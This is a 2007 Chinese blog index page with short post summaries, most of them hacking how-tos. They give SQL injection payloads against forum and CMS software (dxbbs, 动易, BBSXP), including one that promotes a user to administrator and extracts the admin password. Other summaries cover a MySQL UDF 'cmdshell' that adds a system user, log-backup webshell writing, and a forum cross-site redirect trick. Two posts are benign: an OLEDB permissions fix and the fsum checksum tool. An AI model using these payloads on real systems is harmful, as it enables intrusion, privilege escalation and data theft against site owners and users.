2007年6月25日
摘要: 呵呵经过上次cooldiyer的社会工程学。给我上了一课。这次就不发切图了。方法叙述给大家。http://www.cooldiyer.com/index.aspx (就借用cooldiyer名字做个教程)首先我们暴个路径看看。http://www.cooldiyer.com/~index.aspx成功暴出路径。知道了路径如果是sql的数据库就可以差异备份和log备份。不过今天我们讲的是log备份。... 阅读全文
posted @ 2007-06-25 02:59 %5C 阅读(482) 评论(0) 推荐(0) 编辑
摘要: 影响版本:< dxbbs 7.3 详细说明:在User_Friend.aspx过滤了=Add&Name=admin加上''典型的过滤不严,导致注入漏洞. 参考:http://www.winshell.cn/read.php?5... 阅读全文
posted @ 2007-06-25 02:52 %5C 阅读(302) 评论(0) 推荐(0) 编辑
摘要: 前段时间就知道动易不止一个洞,这又被人放出来, 通杀ACC,MSSQL http://site.com/region.asp?country=tt&city=whytt&province=shi' 阅读全文
posted @ 2007-06-25 02:50 %5C 阅读(5942) 评论(0) 推荐(0) 编辑
摘要: C:\Winnt\udf.dll 2000C:\Windows\udf.dll 2003 现在基本上win的服务器就这两个导出UDF.DLL create function cmdshell returns string soname 'udf.dll'select cmdshell('net user user password /add'); select cmdshell('net ... 阅读全文
posted @ 2007-06-25 02:28 %5C 阅读(336) 评论(1) 推荐(0) 编辑
摘要: 芊芊做的教程这里记录一下: 注册---->发帖---->编辑(抓包提交)define:cnsapc为注册用户 bug为帖子内容 提升为管理员:&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'-- 获取后台密码"&cnsapc=bug','');update bbsxp_use... 阅读全文
posted @ 2007-06-25 02:20 %5C 阅读(304) 评论(0) 推荐(0) 编辑
摘要: ShopEx 国内市场占有率最高的网店系统.ShopEx是网络购物软件与技术服务全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)以及深层次的电子商务技术服务。************************************... 阅读全文
posted @ 2007-06-25 02:12 %5C 阅读(3148) 评论(1) 推荐(0) 编辑
  2007年6月21日
摘要: 网络上有很多帖子谈到ASP页面出现“未找到提供程序.该程序可能未正确安装”错误的原因。 有一种原因却始终没有没提到,那就是权限问题。 OLEDB的相关驱动程序是安装在C:\program files\common files目录下。如果这个目录没有Users的执行权限的话,也会出现这种问题。对于NTFS格式的C盘,权限是需要仔细设置的。如果C:\program files\下所有目录都具有User... 阅读全文
posted @ 2007-06-21 17:43 %5C 阅读(17544) 评论(1) 推荐(0) 编辑
  2007年6月20日
摘要: 只要把后面的域名改成你所要跳转的域名就可以了...支持wmv的论坛如下发帖: [wmv=314,256,1]http://www.rootkit.com.cn/qq.swf?url=http://www.rootkit.com.cn[/wmv] 其他论坛跨站方法大家自己灵活运用了....比如 mp3 wmv flash rm 等代码的支持格式都可以试一下 阅读全文
posted @ 2007-06-20 14:30 %5C 阅读(185) 评论(0) 推荐(0) 编辑
摘要: 都是在命令行下校验的校验工具 个人觉得 【 fsum 】尤其强大它支持 md2,md4,md5,sha1,sha256,sha384,sha512,rmd,tiger,panama,adler,crc32,edonkey 共13种方式的校验其校验速度也是相当~~~~地快fsum简单用法fsum -js *.exe -->检测当前目录下所有exe文件 用SFV(CRC32)格式输出fsum -jm ... 阅读全文
posted @ 2007-06-20 14:11 %5C 阅读(316) 评论(0) 推荐(0) 编辑
摘要: 旁注以后别用明小子他通过whois.sc站查询,更新比较慢以后大家去http://www.seologs.com/ip-domains.html这里就可以了!!! 阅读全文
posted @ 2007-06-20 13:45 %5C 阅读(393) 评论(0) 推荐(0) 编辑